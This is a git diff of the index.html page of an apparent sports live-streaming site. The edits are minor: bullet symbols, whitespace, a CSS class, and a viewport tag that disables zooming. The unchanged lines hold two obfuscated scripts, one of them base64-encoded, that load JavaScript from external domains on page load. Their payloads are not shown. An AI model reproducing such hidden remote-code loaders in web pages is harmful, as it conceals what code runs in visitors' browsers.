--- a/index.html
+++ b/index.html
@@ -2,7 +2,7 @@
 <html lang="en">
 <head>
   <meta charset="UTF-8" />
-  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
+  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
   <meta name="robots" content="index" />
   <meta name="description" id="meta-description" content="Watch live sports matches and highlights on YoSinTV." />
   <meta name="keywords" id="meta-keywords" content="YoSinTV, live stream, football, cricket, sports highlights" />
@@ -45,21 +45,21 @@
     <section class="bg-white rounded-lg shadow-md p-6 mb-6">
       <div class="space-y-4" id="cricket-matches">
         <h3 class="text-xl sm:text-2xl md:text-3xl font-bold text-gray-900" id="match-name"></h3>
-        <p>• Watch the live of this match in HD Quality, Scroll down to check out every link for Smooth Live Stream of this match.</p>
-        <p>• Predicted lineups are available for the match a few days in advance while the actual lineup will be available about an hour ahead of the match.</p>
+        <p>● Watch the live of this match in HD Quality, Scroll down to check out every link for Smooth Live Stream of this match.</p>
+        <p>● Predicted lineups are available for the match a few days in advance while the actual lineup will be available about an hour ahead of the match.</p>
         <div class="adspos">
           <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-5525538810839147" data-ad-slot="4345862479" data-ad-format="auto" data-full-width-responsive="true"></ins>
           <script>(adsbygoogle = window.adsbygoogle || []).push({});</script>
         </div>
         <div id="live-tracker"></div>
-        <p>• If the first link stops working, freezes, or won’t open, try the second or third link to keep watching without trouble.</p>
-        <p>• 📱💻 = For Both Mobile & PC Devices, 💻 = Best For PC Devices !!</p>
+        <p>● If the first link stops working, freezes, or won’t open, try the second or third link to keep watching without trouble.</p>
+        <p>● 📱💻 = For Both Mobile & PC Devices, 💻 = Best For PC Devices !!</p>
         <div id="live-container"></div>
       </div>
     </section>
 
     <section class="bg-white rounded-lg shadow-md p-6 mb-6">
-      <div id="match-info"></div>
+      <div id="match-info" class="space-y-4"></div>
     </section>
 
     <section class="bg-white rounded-lg shadow-md p-6">
@@ -115,15 +115,12 @@
     <br><noscript><a href="https://www.supercounters.com/">free online counter</a></noscript>
   </div>
 
-
-
 <script>
 const _0x5b42c7=_0x5b16;function _0x5b16(_0x1774b8,_0x55d3f1){const _0x4e4ee3=_0x4e4e();return _0x5b16=function(_0x5b16b8,_0x47460d){_0x5b16b8=_0x5b16b8-0x106;let _0x3de9f7=_0x4e4ee3[_0x5b16b8];return _0x3de9f7;},_0x5b16(_0x1774b8,_0x55d3f1);}function _0x4e4e(){const _0xdaf1ee=['src','async','createElement','44cKriSl','appendChild','423304djsxlW','187230TIZDfn','714nGAFWc','58629IWwcqs','head','https://www.yosintv.link/pmi/blog-script.js','script','9sFPnvV','1280326kzrFiE','4522270NBuGIw','532483WPPCki','5142pvCMyI'];_0x4e4e=function(){return _0xdaf1ee;};return _0x4e4e();}(function(_0x3fc30f,_0xad95e7){const _0x311758=_0x5b16,_0x90d967=_0x3fc30f();while(!![]){try{const _0x394d73=-parseInt(_0x311758(0x113))/0x1+parseInt(_0x311758(0x111))/0x2+-parseInt(_0x311758(0x10c))/0x3*(-parseInt(_0x311758(0x107))/0x4)+-parseInt(_0x311758(0x10a))/0x5+parseInt(_0x311758(0x114))/0x6*(-parseInt(_0x311758(0x10b))/0x7)+-parseInt(_0x311758(0x109))/0x8+-parseInt(_0x311758(0x110))/0x9*(-parseInt(_0x311758(0x112))/0xa);if(_0x394d73===_0xad95e7)break;else _0x90d967['push'](_0x90d967['shift']());}catch(_0x15b4b6){_0x90d967['push'](_0x90d967['shift']());}}}(_0x4e4e,0x91c73));const script=document[_0x5b42c7(0x106)](_0x5b42c7(0x10f));script[_0x5b42c7(0x115)]=_0x5b42c7(0x10e),script[_0x5b42c7(0x116)]=!![],document[_0x5b42c7(0x10d)][_0x5b42c7(0x108)](script);
 </script>
-  
+
 <script>
 const _0x5424b1=_0x4798;(function(_0x5a047e,_0x2e3b4b){const _0x57279f=_0x4798,_0x49e1fe=_0x5a047e();while(!![]){try{const _0x2cd49a=-parseInt(_0x57279f(0x151))/0x1*(parseInt(_0x57279f(0x14c))/0x2)+-parseInt(_0x57279f(0x14d))/0x3+-parseInt(_0x57279f(0x150))/0x4*(parseInt(_0x57279f(0x146))/0x5)+parseInt(_0x57279f(0x14f))/0x6+parseInt(_0x57279f(0x14e))/0x7+-parseInt(_0x57279f(0x147))/0x8*(parseInt(_0x57279f(0x145))/0x9)+-parseInt(_0x57279f(0x14a))/0xa*(-parseInt(_0x57279f(0x149))/0xb);if(_0x2cd49a===_0x2e3b4b)break;else _0x49e1fe['push'](_0x49e1fe['shift']());}catch(_0x47deee){_0x49e1fe['push'](_0x49e1fe['shift']());}}}(_0x474d,0x2ad8c));function _0x4798(_0x2ffa33,_0x6a2f71){const _0x474df9=_0x474d();return _0x4798=function(_0x4798f1,_0x5f5465){_0x4798f1=_0x4798f1-0x145;let _0x5b0406=_0x474df9[_0x4798f1];return _0x5b0406;},_0x4798(_0x2ffa33,_0x6a2f71);}const b64=_0x5424b1(0x14b);document[_0x5424b1(0x148)](atob(b64));function _0x474d(){const _0x2f0933=['809LWoqNb','971595qRSIpw','10lYzWOk','16kPwJdl','write','12639gmjqRL','2930tMKtkG','PHNjcmlwdCBzcmM9Imh0dHBzOi8vYmxvZy5jcmljZm9vdC5uZXQvYXBwLXRlc3QuanMiPjwvc2NyaXB0Pg==','654FEkzUs','140730BzXyzA','1471785seKKat','1084914ZqXUsu','49736amwPRT'];_0x474d=function(){return _0x2f0933;};return _0x474d();}
-</script>
-  
+  </script>
 </body>
 </html>
